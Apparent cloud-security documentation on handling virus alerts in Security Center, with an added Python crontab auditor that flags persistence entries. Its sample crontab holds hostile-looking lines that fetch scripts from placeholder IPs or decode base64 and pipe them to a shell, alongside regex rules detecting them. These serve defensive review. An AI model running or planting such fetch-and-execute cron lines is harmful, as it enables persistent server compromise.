The antivirus feature of Security Center supports deep virus scans, generates alerts when viruses are detected, and handles virus alerts. This topic describes how to use the antivirus feature to handle virus alerts.

Background information

The antivirus feature provides deep virus scans and removes persistent viruses. You can use the antivirus feature to handle the following types of viruses:
  • Ransomware
  • Mining programs
  • DDoS trojans
  • Trojan programs
  • Backdoor programs
  • Malicious programs
  • High-risk programs
  • Worms
  • Suspicious programs
  • Self-mutating trojans
Note: The preceding types of viruses pose significant threats to your servers. Security Center generates alerts when these viruses are detected. We recommend that you handle the virus alerts at the earliest opportunity.

Procedure

  1. Log on to the Security Center console.
  2. In the left-side navigation pane, choose Defense > Anti-Virus.
  3. On the Anti-Virus page, click Process Now.
  4. Find the alert that you want to handle and click Processing in the Actions column.
    To handle multiple alerts at a time, select the required alerts and click Batch handled in the lower-left corner of the page. You can also click Processing above the alert list to handle all virus alerts.
  5. In the Alert handling dialog box, select a method to handle virus alerts.
    The following list describes the methods that you can use to handle virus alerts.
    • Deep cleanup
      Select Deep cleanup to remove the viruses on your servers.
      Security Center experts have conducted tests and analysis on persistent viruses. Based on the test and analysis results, the experts developed the Deep cleanup method to remove persistent viruses. The following list describes how the Deep cleanup method removes persistent viruses.
      • Terminate malicious processes

        Terminate running malicious processes to prevent viruses from compromising your servers.

      • Quarantine malicious files

        Quarantine malicious files to prevent attackers from restarting them. You can analyze the risks or restore the processes that are terminated by mistake. For more information, see Quarantine files.

      • Delete the persistent tasks injected by attackers

        Attackers exploit crontab tasks and malicious download sources to inject persistent tasks. The tasks keep injecting more persistent viruses. Security Center can analyze and remove the persistent tasks. It also uses AI learning to reinforce the security of your servers and remove viruses within a few hours.

      In the Deep cleanup mode, you can enable auto-snapshot to back up your system disks before you remove the viruses. This reduces the risks of data loss when you remove the viruses.
      Note: You are charged for the auto-snapshot service. For example, if the size of the system disk is 40 GB, the fees for snapshot storage are USD 0.005 per day. For more information, see Snapshot.
    • Whitelist
      Click Whitelist to add an alert to the whitelist. After the alert is added to the whitelist, Security Center no longer generates alerts when the alert event reoccurs.
    • Ignore
      Click Ignore to ignore an alert. After you ignore the alert, the status of the alert changes to Ignored. If the alert event reoccurs, Security Center generates alerts.
    • Handled manually
      If you have manually handled the alert, select Handled manually. After you select Handled manually, the status of the alert changes to Handled.
  6. Click Process Now.
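
The Deep cleanup description above says that attackers use crontab tasks and download sources to keep reinjecting viruses. The following added example, which is not Security Center code and does not represent its detection logic, shows how you can review a user crontab (the output of crontab -l) for such entries before or after cleanup. The rule names, the patterns, and the sample crontab are assumptions constructed for illustration.

```python
import re

# Heuristics for cron commands that re-download or re-launch a payload.
# These are illustrative assumptions, not Security Center's detection rules.
SHELL = r"(?:sudo\s+)?(?:ba|da|z)?sh\b"
RULES = [
    ("fetch-pipe-shell", re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*" + SHELL)),
    ("decode-pipe-shell", re.compile(r"\bbase64\s+(?:-d|--decode)\b[^|;&]*\|\s*" + SHELL)),
    ("exec-from-tmp", re.compile(r"^(?:/tmp|/var/tmp|/dev/shm)/\S+")),
]
ENV_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def split_entry(line):
    """Return (schedule, command) for a user-crontab line, else None."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_RE.match(line):
        return None  # blank line, comment, or VAR=value setting
    fields = 1 if line.startswith("@") else 5  # @reboot etc. vs. m h dom mon dow
    parts = line.split(None, fields)
    if len(parts) <= fields:
        return None  # malformed: schedule without a command
    return " ".join(parts[:fields]), parts[fields]

def audit(crontab_text):
    """Return [(line_number, schedule, [rule names])] for flagged entries."""
    findings = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        entry = split_entry(raw)
        if entry is None:
            continue
        schedule, command = entry
        hits = [name for name, rx in RULES if rx.search(command)]
        if hits:
            findings.append((lineno, schedule, hits))
    return findings

# Constructed sample input (documentation-range addresses, not real indicators).
SAMPLE = """\
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://203.0.113.10/x.sh | sh
@reboot wget -q -O - http://198.51.100.7/i | bash >/dev/null 2>&1
*/5 * * * * echo ZWNobyBoaQ== | base64 -d | sh
* * * * * /dev/shm/.cache/updater
30 2 * * 0 curl -o /var/backups/list.txt https://mirror.example.com/list.txt
"""

if __name__ == "__main__":
    for lineno, schedule, hits in audit(SAMPLE):
        print(f"line {lineno}: [{schedule}] {', '.join(hits)}")
```

The flagged entries are candidates for review, not verdicts. System crontabs such as /etc/crontab carry an extra user field before the command, which this example does not parse.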